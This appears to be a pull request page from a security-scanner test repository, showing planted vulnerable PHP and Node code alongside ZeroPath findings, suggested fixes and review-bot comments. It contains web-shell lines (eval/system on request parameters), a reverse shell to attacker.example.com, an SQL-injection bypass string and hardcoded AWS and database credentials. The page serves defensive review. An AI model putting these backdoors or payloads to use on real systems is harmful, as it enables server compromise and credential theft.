Yay #15
PR merge test
|
|
||
|
|
||
|
|
||
| eval($_GET["XSS"]); | ||
|
|
||
|
|
||
| // mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/ | ||
|
|
||
|
|
||
| system($_GET["cmd"]); | ||
|
|
||
|
|
||
| /* |
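Review bot: `eval($_GET["XSS"]);` and `system($_GET["cmd"]);` hand any unauthenticated requester PHP code execution and shell command execution as the web-server user; no input filter makes either call safe, so both lines have to be deleted outright rather than wrapped or validated. The `// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/` line is a connection string with an embedded password: if it is a deliberate canary token, say so in the comment; if it is not, remove it and rotate it, because a commented-out secret is still a secret in source and in git history. The hunk also ends by opening a `/*` whose closing `*/` is not in view; confirm it is terminated so the remainder of the file is not silently commented out.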
Critical RCE Vulnerability in upload.php via eval() and system() (Severity: HIGH)
This code is vulnerable to remote code execution, allowing attackers to execute arbitrary commands on the server. The upload.php script directly uses eval($_GET["XSS"]) and system($_GET["cmd"]), which causes any code provided in the XSS or cmd URL parameters to be executed with the privileges of the web server user. This critical vulnerability allows complete compromise of the server.
View details in ZeroPath
| eval($_GET["XSS"]); | |
| // mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/ | |
| system($_GET["cmd"]); | |
| /* | |
| // Removed insecure use of eval — user-supplied code execution is forbidden | |
| if (isset($_GET["XSS"])) { | |
| error_log("Blocked dangerous eval attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown")); | |
| http_response_code(400); | |
| echo "Invalid request"; | |
| exit; | |
| } | |
| // mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/ | |
| // Removed insecure use of system — executing arbitrary commands is forbidden | |
| if (isset($_GET["cmd"])) { | |
| error_log("Blocked dangerous system() attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown")); | |
| http_response_code(400); | |
| echo "Invalid request"; | |
| exit; | |
| } | |
| /* |
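Review bot: The proposed replacement removes the two code-execution sinks but carries the `// mysql://...@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/` line forward unchanged and still ends on an unmatched `/*`, so the embedded credential stays in the file after the "fix". The two guard blocks are identical apart from the log message; fold them into a single `if (isset($_GET["XSS"]) || isset($_GET["cmd"]))` check. Note also that a parameter merely being present is not an attack, so the 400 here is a tripwire for probing, not an authorization decision, and the `error_log(... $_SERVER["REMOTE_ADDR"] ...)` will record the proxy address if the app sits behind one.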
| echo "<h>" .$_GET["search"]. "</h>"; | ||
|
|
||
|
|
||
| exec($_POST["exec"]); |
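Review bot: These lines carry two problems, not one. `exec($_POST["exec"]);` runs whatever the client posts as a shell command and has to be removed entirely. `echo "<h>" .$_GET["search"]. "</h>";` writes a raw query parameter into the response body, a reflected XSS the scanner comment does not mention; either drop the echo or escape it with `htmlspecialchars($_GET["search"] ?? '', ENT_QUOTES, 'UTF-8')`.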
Remote Code Execution via Unsanitized Input in index.php (Severity: HIGH)
The application is vulnerable to remote code execution. Specifically, the exec function in index.php (lines 3-6) executes the contents of the $_POST["exec"] parameter, which allows attackers to run arbitrary system commands. This can lead to complete server compromise.
View details in ZeroPath
| echo "<h>" .$_GET["search"]. "</h>"; | |
| exec($_POST["exec"]); | |
| echo "<h>" .$_GET["search"]. "</h>"; | |
| // Block remote command execution to prevent RCE. | |
| $__blocked_exec = $_POST['exec'] ?? ''; | |
| if ($__blocked_exec !== '') { | |
| error_log('Blocked attempt to execute command via POST[exec]: ' . substr($__blocked_exec, 0, 200)); | |
| } | |
| echo 'Command execution via web is disabled for security reasons.'; |
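Review bot: The replacement deletes the exec() call but leaves `echo "<h>" .$_GET["search"]. "</h>";` exactly as it was, so the reflected XSS survives the fix. The new `error_log('Blocked attempt to execute command via POST[exec]: ' . substr($__blocked_exec, 0, 200));` also writes up to 200 bytes of attacker-chosen text straight into the log; newlines and terminal escape sequences in that value can forge log entries, so log a length or hash of the input, or strip control characters before logging it. The `$__blocked_exec` name reads like a generated or private variable; a plain name is clearer.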
| // RCE | ||
| wss.on('connection', ws => { | ||
| ws.on('message', msg => { | ||
| eval(msg); | ||
| ws.send('Executed: ' + msg); | ||
| }); | ||
| }); |
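Review bot: `eval(msg)` on every incoming frame is remote code execution for anyone who can open a socket to this server, and nothing in the visible `connection` handler authenticates the client before the message handler runs. No sanitizer makes eval of untrusted input safe; replace it with parsing of a fixed message schema and dispatch on an allowlisted action, and do not echo the raw frame back as `ws.send('Executed: ' + msg)` does.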
RCE Vulnerability via Unsanitized WebSocket Message in ws/index.js (Severity: HIGH)
This vulnerability allows for remote code execution (RCE) because unsanitized messages received via the WebSocket in ws/index.js are directly passed to the eval() function. Specifically, the ws.on('message', msg => { eval(msg); ... }); block on lines 1-12 takes the incoming message without validation, which causes arbitrary JavaScript code to be executed on the server. An attacker could exploit this to gain complete control of the system.
View details in ZeroPath
| // RCE | |
| wss.on('connection', ws => { | |
| ws.on('message', msg => { | |
| eval(msg); | |
| ws.send('Executed: ' + msg); | |
| }); | |
| }); | |
| // RCE | |
| wss.on('connection', ws => { | |
| ws.on('message', msg => { | |
| // Block direct eval of incoming messages to mitigate RCE | |
| try { | |
| // Expect JSON messages with { action: 'echo', data: '...' } | |
| const parsed = JSON.parse(msg); | |
| if (parsed && parsed.action === 'echo') { | |
| ws.send('Echo: ' + String(parsed.data)); | |
| } else { | |
| ws.send('Rejected: unsupported or unsafe message format'); | |
| } | |
| } catch (e) { | |
| // Not JSON - reject instead of executing | |
| ws.send('Rejected: messages must be JSON with an allowed action'); | |
| } | |
| ws.send('Executed: ' + msg); | |
| }); | |
| }); |
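Review bot: The `ws.send('Executed: ' + msg);` left after the `catch` block is leftover from the old handler: it runs for every message, including ones the new code just rejected, echoes the raw frame back and claims something was executed. Delete it so each branch sends exactly one reply. The try/catch around `JSON.parse(msg)` plus the `parsed.action === 'echo'` allowlist is the right shape; consider also requiring `typeof parsed.data === 'string'` before `String(parsed.data)` so an object or array is not stringified and echoed.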
| const { exec } = require('child_process'); | ||
|
|
||
| const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; | ||
|
|
||
| console.log('[*] Executing reverse shell payload…'); | ||
| exec(payload, (err, stdout, stderr) => { | ||
| if (err) { | ||
| console.error('[!] Error executing payload:', err); | ||
| return; | ||
| } | ||
| console.log('[+] Payload executed. stdout:', stdout); | ||
| }); |
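Review bot: This is a backdoor, not a bug: at module load it runs `bash -i >& /dev/tcp/attacker.example.com/4444 0>&1` through `exec`, an unconditional reverse shell to a hard-coded host and port. There is no legitimate version to refactor towards; delete the file, find out how it got into the branch, and treat the commit as a supply-chain incident. That `exec` runs the string through `/bin/sh`, where the bash-only `>&` and `/dev/tcp` forms may not work, is not a mitigation.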
Hardcoded Reverse Shell Backdoor in stdin/index.js (Severity: HIGH)
The application contains a hardcoded reverse shell payload within the stdin/index.js file, lines 1-12, creating a significant security risk. Specifically, the payload variable contains a bash command that, when executed via exec, attempts to establish a reverse shell connection to attacker.example.com on port 4444. This would allow an attacker to gain unauthorized remote access to the system if the code is ever executed.
View details in ZeroPath
| const { exec } = require('child_process'); | |
| const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'; | |
| console.log('[*] Executing reverse shell payload…'); | |
| exec(payload, (err, stdout, stderr) => { | |
| if (err) { | |
| console.error('[!] Error executing payload:', err); | |
| return; | |
| } | |
| console.log('[+] Payload executed. stdout:', stdout); | |
| }); | |
| /* | |
| * Security fix: Removed hardcoded reverse shell payload. | |
| * The previous implementation executed a reverse shell command which is a critical security risk. | |
| * This module now provides a safe stub. Implement secure behavior as needed. | |
| */ | |
| console.error('[!] Security: removed hardcoded reverse shell payload. No action taken.'); | |
| module.exports = { | |
| executePayload: () => { | |
| // Intentionally no-op to avoid executing arbitrary commands. | |
| return Promise.resolve({ result: 'blocked' }); | |
| } | |
| }; |
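Review bot: The stub still exports `executePayload()` resolving `{ result: 'blocked' }`, so any caller gets a success-shaped promise from a function named after the removed backdoor; remove the module and its `require` sites rather than ship a no-op under that name. The `console.error('[!] Security: removed hardcoded reverse shell payload. No action taken.')` fires on every load and belongs in the commit message, not at runtime.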
|
|
||
| /* | ||
| [default] | ||
| aws_access_key_id = AKIA2T2SJH6M76LT25T4 |
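Review bot: `aws_access_key_id = AKIA2T2SJH6M76LT25T4` (with the matching secret on line 17, per the scanner comment) is compromised the moment it is pushed; enclosing it in `/* ... */` does not change that. Deactivate or rotate the key in IAM before merging anything, check CloudTrail for activity under it, and purge it from history with `git filter-repo` (or BFG), since deleting the line in a later commit leaves it retrievable.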
Hardcoded AWS Credentials in upload.php (Severity: CRITICAL)
Compromised AWS credentials can lead to unauthorized access to cloud resources, potentially resulting in data breaches and service disruption. The file upload.php contains hardcoded AWS access key ID (AKIA2T2SJH6M76LT25T4) and secret access key (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) on line 17, which allows anyone with access to the file to manage AWS resources associated with the compromised account. This exposure allows attackers to perform actions within the AWS environment, such as accessing data in S3 buckets or launching EC2 instances.
View details in ZeroPath
| <?php | ||
|
|
||
| function login($username, $password) { | ||
| // Configuration | ||
| $db_host = 'localhost'; | ||
| $db_username = 'root'; | ||
| $db_password = 'root@1234'; | ||
| $db_name = 'arnicaTest'; | ||
|
|
||
|
|
||
| // Connect to database | ||
| $conn = new mysqli($db_host, $db_username, $db_password, $db_name); | ||
|
|
||
| // Check connection | ||
| if ($conn->connect_error) { | ||
| die("Connection failed: ". $conn->connect_error); | ||
| } | ||
|
|
||
| // admin | ||
| // gdhas' OR 1=1 # | ||
|
|
||
| // Query database | ||
| $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; | ||
|
|
||
| $result = $conn->query($query); | ||
|
|
||
| // Check if user exists | ||
| if ($result->num_rows > 0) { | ||
| echo "Welcome, $username!"; | ||
| } else { | ||
| echo "$query Invalid username or password."; | ||
| } | ||
|
|
||
| // Close connection | ||
| $conn->close(); | ||
| }<?php | ||
|
|
||
|
|
||
| $username = $_POST['username']; | ||
| $password = $_POST['password']; | ||
| login($username, $password); | ||
| ?> |
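Review bot: `$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";` interpolates both POST fields into SQL, and the comment `// gdhas' OR 1=1 #` a few lines above is a working bypass: the `#` comments out the password clause. Use `$conn->prepare('SELECT id FROM users WHERE username = ? AND password = ?')` with `bind_param('ss', $username, $password)`; escaping the interpolated form is not an acceptable substitute. Three more issues in the same lines: `echo "$query Invalid username or password.";` sends the full SQL, submitted password included, back to the client; `$db_username = 'root'; $db_password = 'root@1234';` is a hard-coded root credential; and passwords are compared as plaintext columns instead of via `password_verify()`. `}<?php` is a second PHP open tag directly after the function's closing brace, so either two files were concatenated or the tag is stray; it needs cleaning up before this file parses as intended.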
SQL Injection Vulnerability in test.php (Severity: HIGH)
A SQL injection vulnerability exists in test.php, allowing attackers to potentially read or modify sensitive data. Specifically, the login function in test.php directly incorporates the $username and $password POST parameters into an SQL query without proper sanitization or parameterization, which causes arbitrary SQL code to be executed. An attacker could inject malicious SQL code via the username or password fields, leading to unauthorized data access or modification.
View details in ZeroPath
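The following is an added illustration of the point the comment above makes, not code from this PR or from the ZeroPath suggestion: the same string-built query as test.php, so the effect of the `gdhas' OR 1=1 #` payload quoted in the diff can be seen without a database, beside a parameterized login. It assumes a `users` table with a `password_hash` column holding `password_hash()` output (test.php stores plaintext passwords) and a `mysqli` connection created elsewhere; both are assumptions, not facts from the PR.

```php
<?php
declare(strict_types=1);

// Added example, not code from this PR or from the ZeroPath suggestion.
// Assumptions: a `users` table with a `password_hash` column holding
// password_hash() output, and a mysqli connection created elsewhere.
// The original test.php compares plaintext passwords; that is changed here.

// Same string construction as login() in test.php, kept only to show what
// the quoted payload turns the statement into.
function buildVulnerableQuery(string $username, string $password): string
{
    return "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
}

// Hardened login: the SQL text is fixed at prepare time and the username
// travels as a bound parameter, so a quote or `#` inside it is just data.
function loginSafe(mysqli $conn, string $username, string $password): bool
{
    $stmt = $conn->prepare('SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch() === true;
    $stmt->close();

    // Verify the hash in PHP rather than comparing passwords inside SQL;
    // short-circuit keeps password_verify() off a null hash for unknown users.
    return $found && password_verify($password, $storedHash);
}

// Demonstration with the bypass quoted in test.php: the `#` starts an SQL
// comment, so the AND password = ... clause is discarded by the server.
$payload = "gdhas' OR 1=1 #";
echo buildVulnerableQuery($payload, 'irrelevant'), PHP_EOL;
```

In place of the original `login($username, $password)` call, use `loginSafe($conn, $_POST['username'] ?? '', $_POST['password'] ?? '')`, and on failure return a generic message rather than echoing `$query` as test.php does; the statement text belongs in a server-side log, not the response.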
❌ Possible security or compliance issues detected. Reviewed everything up to bb2dea1. The following issues were found:
No description provided.